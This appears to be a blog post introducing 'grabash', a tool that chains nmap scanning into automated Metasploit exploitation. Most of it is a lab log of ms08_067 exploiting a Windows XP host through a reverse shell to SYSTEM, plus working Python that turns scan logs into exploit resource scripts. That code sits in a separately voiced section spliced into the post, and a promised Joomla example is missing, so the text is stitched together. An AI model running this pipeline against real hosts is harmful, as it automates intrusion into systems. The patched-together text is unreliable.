... the code I wrote a few days ago as a (skeleton for a) "proof-of-concept".
Now I have decided to extend it a little and rewrite the whole code (I assumed it would be a good
exercise for learning Python, because I'm not a programmer :) So...).
TL;DR - on my GitHub you will find the code.
The idea was not to create another super-python-security-scanner but to create a small tool
to run against a host/IP and get a shell if possible. Below you will find an old example for a
vulnerable Windows XP SP2:
(…)
[i] Checking target directory: /home/c/src/grabash/logs/192.168.56.110/
[+] Log directory for target is already created.
[i] Preparing RC files:
[+] Network RC file created at : /home/c/src/grabash/logs/192.168.56.110/msf.rc
[+] HTTP RC file created at : /home/c/src/grabash/logs/192.168.56.110/www.rc
[+] Reading scan log...
[i] MS-DC Active Directory found on port: 445
+ loading : 445 modules...
[i] Reding log file : done.
[i] Starting Metasploit with RC file : /home/c/src/grabash/logs/192.168.56.110/msf.rc
(...)
Love leveraging credentials? Check out bruteforcing in Metasploit Pro -- learn more on http://rapid7.com/metasploit
       =[ metasploit v4.11.5-2016010401 ]
(...)
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing /home/c/src/grabash/logs/192.168.56.110/msf.rc for ERB directives.
resource (/home/c/src/grabash/logs/192.168.56.110/msf.rc)> spool /home/c/src/grabash/logs/192.168.56.110/output.msf
[*] Spooling to file /home/c/src/grabash/logs/192.168.56.110/output.msf...
resource (/home/c/src/grabash/logs/192.168.56.110/msf.rc)> use exploit/windows/smb/ms08_067_netapi
resource (/home/c/src/grabash/logs/192.168.56.110/msf.rc)> set RHOST 192.168.56.110
RHOST => 192.168.56.110
resource (/home/c/src/grabash/logs/192.168.56.110/msf.rc)> run
[*] Started reverse TCP handler on 192.168.56.123:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Polish
[*] Selected Target: Windows XP SP2 Polish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 192.168.56.110
[*] Meterpreter session 1 opened (192.168.56.123:4444 -> 192.168.56.110:1026) at 2016-08-07 02:25:09 -0400
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 500 created.
Channel 1 created.
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\>net view
net view
(...)
-------------------------------------------------------------------------------
\\XPSP2
As you can see, the script starts nmap and saves its output to a log file. 'grep' that log for
'open' port(s) and you have the list of services on the remote machine.
The next idea is to take the information from the scan log, pick the Metasploit modules that may
apply to those services, and save that list (read: possible attacks) to an RC file. Last step: start
msfconsole with the RC file, which is what the "resource (...)>" lines in the output above are.
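The three steps above (parse the nmap log for open ports, map each port to Metasploit modules, write the RC file) as an added example. This is not grabash.py or any code from the author's repository: the nmap grepable log is constructed for the XP host in the post, the port-to-module table is a hypothetical assumption, and so are the function names and paths.

```python
import re

# Constructed sample nmap -oG (grepable) output for the lab host from the post;
# this is NOT a real scan log produced by grabash.
SAMPLE_GNMAP = """\
# Nmap 7.01 scan initiated Sun Aug  7 02:20:01 2016 as: nmap -sV -oG scan.gnmap 192.168.56.110
Host: 192.168.56.110 ()\tStatus: Up
Host: 192.168.56.110 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//, 445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/, 3389/closed/tcp//ms-wbt-server///\tIgnored State: filtered (996)
# Nmap done at Sun Aug  7 02:21:10 2016 -- 1 IP address (1 host up) scanned in 69.02 seconds
"""

# Hypothetical port -> Metasploit module table (assumption: a real tool should
# also key on nmap's service/version string, not on the port number alone).
PORT_MODULES = {
    21: ["auxiliary/scanner/ftp/anonymous"],
    80: ["auxiliary/scanner/http/joomla_version"],
    135: ["auxiliary/scanner/dcerpc/endpoint_mapper"],
    139: ["auxiliary/scanner/smb/smb_version"],
    445: ["exploit/windows/smb/ms08_067_netapi"],
}

# One entry of the -oG "Ports:" field: port/state/proto/owner/service/rpcinfo/version/
PORT_ENTRY = re.compile(r"^(\d+)/(\w+)/(tcp|udp)/[^/]*/([^/]*)/")


def open_ports(gnmap_text):
    """Return {ip: [(port, proto, service), ...]} for every open port in -oG output."""
    hosts = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        # Drop the trailing "Ignored State: ..." column before splitting entries.
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        for entry in ports_field.split(","):
            m = PORT_ENTRY.match(entry.strip())
            if m and m.group(2) == "open":
                hosts.setdefault(ip, []).append((int(m.group(1)), m.group(3), m.group(4)))
    return hosts


def build_rc(ip, ports, logdir):
    """Build a msfconsole resource script for one host, in the spool/use/set/run
    shape of the msf.rc shown in the post (logdir is an assumed output directory)."""
    lines = [f"spool {logdir}/output.msf"]
    for port, _proto, _service in ports:
        for module in PORT_MODULES.get(port, []):
            # Scanner modules take RHOSTS (a range); exploit modules take a single RHOST.
            target_opt = "RHOSTS" if module.startswith("auxiliary/scanner/") else "RHOST"
            lines += [f"use {module}", f"set {target_opt} {ip}", "run"]
    lines.append("spool off")
    return "\n".join(lines) + "\n"


def rc_for_scan(gnmap_text, logroot):
    """Map a whole scan log to {ip: rc_text}, one RC file per scanned host."""
    return {ip: build_rc(ip, ports, f"{logroot}/{ip}")
            for ip, ports in open_ports(gnmap_text).items()}


if __name__ == "__main__":
    for ip, rc in rc_for_scan(SAMPLE_GNMAP, "/home/c/src/grabash/logs").items():
        print(f"# {ip}\n{rc}")
```

Two practical points the post's output hints at: `run` on an exploit drops msfconsole straight into the new session (which is why the log above ends at a meterpreter prompt rather than continuing with the next module), so a script that queues several exploits per host would want `exploit -z` instead; and keying modules on the port number alone is what makes the tool report "Active Directory" on 445 for a standalone XP box, so the service string nmap already gives you is worth matching too.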
Some example output from a few tests, in case we find Joomla:
As you will see during your (free) Metasploit adventures, a few modules do not work "correctly".
(Maybe it's related to my settings, maybe not; anyway...) The skeleton of grabash.py is really simple.
If you know Ruby (or Metasploit), you can extend it and prepare more modules for your own pentests.
In case of any questions, feel free to ask.
Remember to use the code only:
- in your own environment
- for legal purposes
- not on 'production'
Remember (and understand) that the modules used inside this code
can cause damage or 'blue screens'.
Use it at your own risk.
Cheers